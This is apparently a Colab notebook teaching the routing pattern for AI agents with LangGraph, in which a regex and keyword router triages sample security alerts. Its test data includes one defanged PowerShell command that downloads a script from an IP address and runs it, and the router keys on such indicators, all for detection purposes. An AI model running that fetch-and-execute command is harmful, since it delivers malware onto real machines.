<a href="https://colab.research.google.com/github/Dimildizio/DS_course/blob/main/Agents/Agentic_patterns/Routing_pattern.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Routing Pattern

**Core AI pattern:** chooses the right path (prompt, tool, model, or chain) for each input.

Boosts accuracy, lowers cost/latency, and keeps outputs consistent by **sending different problems to different specialists**.

Essential for agents that must decide what to do next before doing it.

Building block for tool-use, multi-expert systems, and safe fallbacks.

## Theory

### What is it?

A **router** inspects an input and **dispatches** it **to** the best **handler**:

- Different prompts (e.g., “SQL Expert” vs “Email Writer”)

- Different tools (calculator, web search, vector DB)

- Different models (small/cheap vs large/accurate)

- Different sub-chains (RAG flow vs generation-only, etc)

The router can be **rule-based, ML/embedding-based, LLM-as-classifier, or hybrid.**

### Why It Matters?

**One-size-fits-all prompts** waste tokens and **underperform** because:

- Tasks have heterogeneous structure and constraints.

- Some cases need tools, others don't.

- Many inputs are easy (use small model), some are hard (escalate).

- Safety/compliance may require blocking or escalation.


#### Routing improves:

- Accuracy: expert prompts beat generic ones.

- Cost/Latency: cheap paths for easy cases; heavy paths only when needed.

- Safety: detect disallowed/PII-sensitive inputs and abstain or handoff.

### Key Components

**Classifier / Gating**

- Rules: regex/keywords, heuristics, schema checks.
- Embeddings/ML: nearest-neighbor to labeled routes, lightweight classifiers.
- LLM-as-Router: single JSON decision (route, confidence, rationale).
- Hybrid: rules first (fast/safe), then LLM when uncertain.

**Targets (Experts)**

- Prompts, tools, models, or full chains with clear contracts (input/output schema).

**Unification Layer**

- Normalize outputs across branches (e.g., a common JSON envelope) so downstream code stays simple.

**Confidence & Fallbacks**

- Thresholds, tie-breakers, "unknown/abstain," human-in-the-loop, or a generalist path.

**Observability**

- Route logs, confusion matrix, coverage/precision, cost & latency per route.

**Policy & Safety**

- Guardrails pre- and post-route (blocklists, PII detection, content policies).

### Practical Use Cases

- Customer support triage: billing vs tech vs account -> distinct prompts/RAG corpora.
- Code assistant: detect language (Py/JS/SQL) -> language-specific prompts & unit-testers.
- Doc extraction: detect doc type (invoice, receipt, ID) -> specialized parsers/schemata as tool.
- RAG index selection: pick the right knowledge base or retriever per query.
- Tool choice (I'd say most obvious): math -> calculator; current events -> web; entity lookup -> DB.
- Multilingual: route by language to locale-tuned prompts/models.
- Security: alert/IOC triage -> malware vs phishing vs misconfig paths; escalate unknowns.

### Tricks, pieces of advice and things to consider

**Design choice**: Rules vs ML/embeddings vs LLM-as-router

- Rules (regex/heuristics): Fast, cheap, transparent.
- ML / Embeddings classifier: Train a lightweight model (or use nearest-neighbor on embeddings) to map inputs -> routes.
- LLM-as-router: Ask an LLM to return `{route: "...", confidence: 0–1, rationale: "..."}`, however in practice LLM would likely return 0.3 for not sure, 0.9 for high confidence so it really feels binary
- Hybrid (in practice wins in most cases): Rules first (block obvious, fast wins) -> embeddings/ML if uncertain -> LLM only when confidence is low or case is novel.

**Contract**: Keep branch outputs schema-aligned.

- What: Every branch should return the same envelope so downstream code doesn’t care which path ran.
- Why: Simplifies integration, logging, and evaluation.
- How: Validate with Pydantic (or Marshmallow) and reject/repair non-conforming outputs.


**Safety**: Always include block/abstain and human handoff. The router must be able to say "don't answer" and escalate.

- Blocklist / policy gates (pre-route): `disallowed content -> {route:"blocked", reason:"pii_detected"}`.
- Abstain on low-confidence: If `confidence < threshold -> {route:"abstain"}` and trigger fallback (generalist model) or human triage.
- Post-route checks: Scan generated outputs (hallucination detector, SQL safety linter). If fails -> auto-revise or escalate.
- Metadata to keep: `reason`, `policy_category`, `recommended_action: "escalate|revise|drop"`.
-Obviously do not forget to escalate and return.
For example:
```
{ "route":"abstain", "confidence":0.42, "reason":"ambiguous intent", "handoff":"human_security_analyst" }
```

**Ops**: Track route quality and adjust thresholds, cache easy decisions.

Treat routing like a model-measure and tune it.

- Metrics to log

  - Coverage per route (% of traffic).
  - Accuracy/Success per route (task-specific score).
  - Confusion matrix (where the router picked A but ground truth was B).
  - Latency & cost per route.
  - Abstain rate and escalation outcomes.

- Threshold tuning

  - Pick confidence threshold per route to maximize a cost-aware objective. (Might be tricky to choose how).

- Caching

  - ALWAYS take into account KV-cache since depending on context window it could eat way more vRAM than the model itself. Use KV budgets, eviction tiers, and route-aware policies to keep VRAM stable. Alternatives to KV-cache - prefix KV cache (bounded), response cache (exact matches), retrieval/embedding cache (to reduce prompt length next time).
  - Cache final answers and shared prefixes, not full user contexts.
  - Normalize input -> compute a routing key (for example hash of lemmatized text).
  - If seen before with high confidence, reuse route (and even final answer if safe).
  - Great for FAQs and repeated queries -> slashes latency/cost.



## TL;DR

**What**: A decision layer that routes inputs to the best expert path.

**Why**: Higher accuracy with lower cost/latency and better safety.

**Rule of Thumb**: Use routing when tasks are heterogeneous, tools/models differ by case, or you need abstain/escalation behavior.

## Practice

### Set up

In [1]:
pip install -q langgraph

     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 43.7/43.7 kB 1.5 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 153.3/153.3 kB 3.8 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 43.9/43.9 kB 3.6 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 54.6/54.6 kB 3.0 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 216.7/216.7 kB 18.6 MB/s eta 0:00:00


In [5]:
import os
import json
import re
import requests
import time
import math
import hashlib
import string
import requests
import numpy as np

from typing import TypedDict, Optional

from google.colab import userdata
from langgraph.graph import StateGraph, END
from pydantic import BaseModel, Field
from sentence_transformers import SentenceTransformer
from sklearn.metrics.pairwise import cosine_similarity


OPENROUTER_API_KEY = userdata.get('openrouter')

BASE_URL = "https://openrouter.ai/api/v1/chat/completions"
HEADERS = {"Authorization": f"Bearer {OPENROUTER_API_KEY}"}

MODEL_ROUTER = "qwen/qwen3-30b-a3b:free"
MODEL_EXPERT = "mistralai/mistral-small-3.2-24b-instruct:free"


#### Dataset example

In [6]:
TEST_ALERTS = [
  ("phishing", """User reports email urging immediate password reset. Link goes to login-acme-security[.]com, DKIM fails. Message requests MFA backup codes."""),
  ("malware", """EDR flagged PowerShell: iwr hxxp://185.203.116.44/upd.ps1 -o C:\\Users\\Public\\upd.ps1; start-process. File hash 9f2c...e12. Beacon-like 60s jitter."""),
  ("misconfig", """CloudTrail shows s3://acme-data set to public-read. No IOCs; finding is CIS-3.1 noncompliance."""),
  ("blocked", """Email contains full card: 4111-1111-1111-1111 exp 12/27. Requesting storage in helpdesk ticket."""),
  ("unknown", """Potential lateral movement from srv-db-03 to srv-erp-02. Insufficient details to classify.""")]


### Call func

In [7]:
def call(model, messages, **kw):
    payload = {"model": model, "messages": messages, **kw}
    r = requests.post(BASE_URL, headers=HEADERS, json=payload, timeout=20)
    r.raise_for_status()
    return r.json()["choices"][0]["message"]["content"]

### Unified Envelope

In [9]:
class Envelope(BaseModel):
    route: str
    answer: str
    data: dict = Field(default_factory=dict)
    citations: list[str] = Field(default_factory=list)
    confidence: float = 0.0
    extras: dict = Field(default_factory=dict)
    error: str | None = None
    schema_version: str = "1.0"


### LAB 1: Heuristic Rules Router as a Graph Node

First layer of Routing

**Skill**: Rules/regex gating + building LangGraph node and edge.

**Goal**: Classify alerts with simple heuristics and return (route, confidence, reason).

#### **Task**

- Implement rules_router(alert_text).
- Build a minimal LangGraph with a single node rules_node and a terminal.
- Run the graph on TEST_ALERTS and note misroutes/abstains.


#### **Explanation**

- We put a pre-route safety gate into rules to block PII right away (fast & safe).
- Routing is like airport security: simple metal detectors first, then more advanced scans if needed.
- We return a structured decision to keep later steps consistent.
- A single-node graph is trivial, but forces you into explicit control flow, which will pay off as we add branches.


#### **Whats and Why's**

- Define possible routes -> phishing, malware, misconfig, abstain (not sure), blocked (policy violation).

- Write basic rules (regex + keywords) -> if we see signs of credit card numbers -> block, if we see "reset password" -> phishing; if "powershell" → malware; if "public-read" -> misconfig.

- Build a routing node in a LangGraph -> this wraps the rules into a reusable step in a graph of decisions.

Heuristics would be a first Layer in **Hybrid Router**
- Rules catch the obvious 60-70% of cases, and we only escalate the tricky ones.

#### Define RouteState

A StateGraph is a directed graph where each node is a function that takes some state (a Python dict/TypedDict) and returns updated state. Basically carry the alert and the routing decision.

Here, RouteState defines what fields we track (text, decision).



In [11]:
class RouteState(TypedDict):
    text: str
    decision: Optional[dict]

#### Define rules

In [12]:
ROUTES = ["phishing","malware","misconfig","abstain","blocked"]


def rules_node(state: RouteState):
    return {"decision": rules_router(state["text"])}


def rules_router(text: str): # very basic router rules
    t = text.lower()
    # Pre-route blocklist (crude CC number)
    if re.search(r"\b(?:\d[ -]*?){13,16}\b", t):
        return {"route":"blocked","confidence":0.99,"reason":"pii_detected:card"}
    # Phishing
    if any(k in t for k in ["dkim fails","reset password","mfa backup codes"]) or "login-" in t:
        return {"route":"phishing","confidence":0.8,"reason":"email_auth_signals"}
    # Malware
    if any(k in t for k in ["powershell","beacon","hxxp://","upd.ps1","hash "]):
        return {"route":"malware","confidence":0.8,"reason":"edr_iocs"}
    # Misconfig
    if any(k in t for k in ["public-read","cis-","0.0.0.0/0","open bucket","exposed s3"]):
        return {"route":"misconfig","confidence":0.75,"reason":"cloud_misconfig"}
    return {"route":"abstain","confidence":0.4,"reason":"insufficient_rules"}


#### Flow

```scss
   (Entry)
     │
     ▼
 [ rules_node ]  --decision-->  END

```

#### LangGraph recap

**Node**

A `node` is a function wrapped into the graph.

In `rules_node` defined above when the graph hits the `rules` node, it executes `rules_node` and *updates the state* with a new decision.

**Entry point**

Is where the graph starts when we run it.

Every run starts by going through the `rules` node (that execute `rules_node`).

**Edges**

Edge connects two nodes: after rules, go to `END`.

`END` is a special built-in that tells to stop and return the final state.

So in this first graph below here, it's a straight pipeline: `start → rules → END.`

**Invoking**

`g.compile()` below turns the graph definition into an executable object (*app1*).

`.invoke(state)` runs the graph with an initial state.

The graph will:

1. Start at the entry point (rules)
2. Run the node function (rules_node)
3. Follow the edges/conditionals (in further labs) until it reaches END
4. Return the final state dictionary


Eventhough we use `.invoke` in several other libraries to call ML/LLM models, here `.invoke` is not necessary a call to LLM, it **just runs the workflow.**

*WHAT* it calls *depends on what's inside the nodes*.

In [13]:
g = StateGraph(RouteState)
g.add_node("rules", rules_node)
g.set_entry_point("rules")
g.add_edge("rules", END)
app1 = g.compile()

In [14]:
# Don't forget - no llm included yet, only heuristics
for label, text in TEST_ALERTS:
    out = app1.invoke({"text": text, "decision": None})
    print(label, "->", out["decision"])

phishing -> {'route': 'phishing', 'confidence': 0.8, 'reason': 'email_auth_signals'}
malware -> {'route': 'malware', 'confidence': 0.8, 'reason': 'edr_iocs'}
misconfig -> {'route': 'misconfig', 'confidence': 0.75, 'reason': 'cloud_misconfig'}
blocked -> {'route': 'blocked', 'confidence': 0.99, 'reason': 'pii_detected:card'}
unknown -> {'route': 'abstain', 'confidence': 0.4, 'reason': 'insufficient_rules'}
